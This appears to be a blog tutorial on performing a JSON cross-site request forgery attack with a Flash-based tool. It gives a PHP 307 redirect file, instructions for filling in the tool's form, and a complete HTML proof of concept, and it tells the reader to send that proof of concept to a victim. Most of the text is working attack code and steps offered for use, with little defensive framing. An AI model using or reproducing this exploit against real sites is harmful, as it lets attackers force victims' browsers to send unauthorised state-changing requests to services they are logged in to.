Step-1
Go to terminal and typegit clone https://github.com/sp1d3r/swf_json_csrf.git
Step 2
now we have to create an 307 redirect file and paste the target endpoint in the file<?php
header("Location: https://target.com/endpoint", true, 307);
?>
Step 3
Now we have to fill the appropriate details in the form
PHP redirector -- > address of the step 2 file
Destination --> Target endpoint
POST-Date --> Data that needed to be sent to target endpoint
Response --> keep it blank
After that press f12 button to open the developer toolkit.
Click launch Button
copy the Request url send to test.swf file
Step 4
Now we have the url . We can create an CSRF POC using htmlCreate an new html file
Using <object data="PASTE URL HERE"><object>
Save file
Send the CSRF POC to victim
And the final POC will look like
<!DOCTYPE html><html>
<head>
<title></title>
</head>
<body>
<object data="http://127.0.0.1/swf_json_csrf/test.swf?endpoint=http://target.com/users&reqmethod=POST&ct=application/json&jsonData={%22test%22:%22test%22}&php_url=http://127.0.0.1/test.php"></object>
</body>
</html>
Thank you.
How can I contact you? I am confused about something here
ReplyDelete